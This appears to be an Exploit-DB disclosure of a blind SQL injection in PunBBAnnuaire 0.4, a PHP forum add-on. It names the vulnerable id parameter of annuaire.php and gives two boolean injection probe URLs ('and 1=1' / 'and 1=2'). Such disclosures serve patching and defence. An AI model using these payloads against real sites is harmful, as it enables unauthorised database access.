PunBBAnnuaire 0.4 - Blind SQL Injection

EDB-ID:

11490

CVE:

N/A




Platform:

PHP

Date:

2010-02-17


PunBBAnnuaire <=0.4 Blind SQL Injection Vulnerability
========================================================

####################################################################
.:. Author : Metropolis
.:. Home : http://xrayoptics.by.ru/
.:. Script : PunBBAnnuaire
.:. Version : 0.4
.:. Download Script: http://www.punres.org/download.php?id=1737
.:. Bug Type : Blind Sql Injection

####################################################################

===[ Exploit ]===

/annuaire.php?action=site&id=1[ Blind SQL INJECTION ]


www.site.com/forum/annuaire.php?action=site&id=1 and 1=1 <-- true

www.site.com/forum/annuaire.php?action=site&id=1 and 1=2 <-- false



####################################################################

Vive la France !